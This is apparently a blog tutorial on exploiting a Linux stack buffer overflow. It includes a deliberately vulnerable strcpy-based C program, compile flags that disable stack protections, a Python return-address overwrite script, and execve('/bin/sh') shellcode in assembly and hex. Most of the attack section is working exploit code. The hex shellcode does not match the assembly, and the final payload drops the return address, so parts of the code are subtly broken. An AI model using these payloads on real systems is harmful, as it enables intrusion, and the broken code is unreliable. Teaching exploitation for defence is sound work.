Introduction
Penetration testing involves simulating cyber attacks to identify vulnerabilities in a system before malicious hackers can exploit them. One of the most critical security flaws in software is the stack buffer overflow, which attackers can use to execute arbitrary code and gain control over a system.
This article explores stack buffer overflow in Linux, assembly code concepts, and how Python can be used for penetration testing.
Understanding Stack Buffer Overflow
A stack buffer overflow occurs when a program writes more data into a buffer on the stack than it was allocated. This excess data can overwrite adjacent memory, including the function’s saved frame pointer (SFP) and return address, potentially leading to arbitrary code execution.
Example: Vulnerable C Code
Consider the following C program, which contains a stack buffer overflow vulnerability:
c
CopyEdit
#include <stdio.h>
#include <string.h>
void vulnerable_function(char *user_input) {
char buffer[32]; // Small buffer size
strcpy(buffer, user_input); // Unsafe function
printf(“User input: %s\n”, buffer);
}
int main(int argc, char *argv[]) {
if (argc < 2) {
printf(“Usage: %s <input>\n”, argv[0]);
return 1;
}
vulnerable_function(argv[1]);
return 0;
}
What’s Wrong with This Code?
- The function vulnerable_function does not check the length of user_input.
- If user_input exceeds 32 bytes, it overwrites adjacent memory, including the return address.
- An attacker can craft input that redirects execution to malicious code.
Exploiting Buffer Overflow in Linux
1. Analyzing the Vulnerable Program
Compile the program with disabled security protections:
bash
CopyEdit
gcc -fno-stack-protector -z execstack -o exploit target.c
- -fno-stack-protector: Disables stack protection.
- -z execstack: Allows execution of injected shellcode.
Run the program with a long input to check for crashes:
bash
CopyEdit
./exploit $(python3 -c ‘print(“A”*100)’)
If it crashes, the buffer overflow is working.
2. Using Python to Exploit the Vulnerability
Python can help automate buffer overflow exploitation. Here’s a basic exploit script:
python
CopyEdit
import sys
# Overflow payload: 40 “A”s followed by an address overwrite
payload = b”A” * 40
payload += b”\xef\xbe\xad\xde” # Example return address (Little Endian format)
print(“Sending payload…”)
sys.stdout.buffer.write(payload)
Redirect output to the vulnerable program:
bash
CopyEdit
python3 exploit.py | ./exploit
If successful, the program will try to execute code at the overwritten address.
Writing Shellcode in Assembly
To fully exploit a buffer overflow, attackers inject shellcode, which executes arbitrary commands. Below is a simple Linux shellcode in x86 assembly:
assembly
CopyEdit
section .text
global _start
_start:
; syscall execve(“/bin/sh”, NULL, NULL)
xor eax, eax
push eax
push 0x68732f6e
push 0x69622f2f
mov ebx, esp
xor ecx, ecx
xor edx, edx
mov al, 11 ; execve syscall number
int 0x80 ; Trigger syscall
Assemble and extract shellcode:
bash
CopyEdit
nasm -f elf32 shellcode.asm -o shellcode.o
objcopy -O binary -j .text shellcode.o shellcode.bin
hexdump -v -e ‘”\\x” 1/1 “%02x”‘ shellcode.bin
Inject the shellcode into Python:
python
CopyEdit
shellcode = b”\x31\xc0\x50\x68\x2f\x2f\x62\x69\x68\x2f\x73\x68\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80″
payload = b”A” * 40 + shellcode
sys.stdout.buffer.write(payload)
Mitigating Stack Buffer Overflow
Modern Linux systems implement several security mechanisms to prevent buffer overflow attacks:
- Stack Canaries (-fstack-protector)
- Address Space Layout Randomization (ASLR)
- Non-Executable Stack (NX-bit)
To check ASLR status:
bash
CopyEdit
cat /proc/sys/kernel/randomize_va_space
(1 = Partial, 2 = Full, 0 = Disabled)
Conclusion
Stack buffer overflow is a powerful exploitation technique often used in penetration testing. By understanding how memory works and leveraging Python for automation, ethical hackers can identify and mitigate security risks.
We love to share our knowledge on current technologies. Our motto is ‘Do our best so that we can’t blame ourselves for anything“.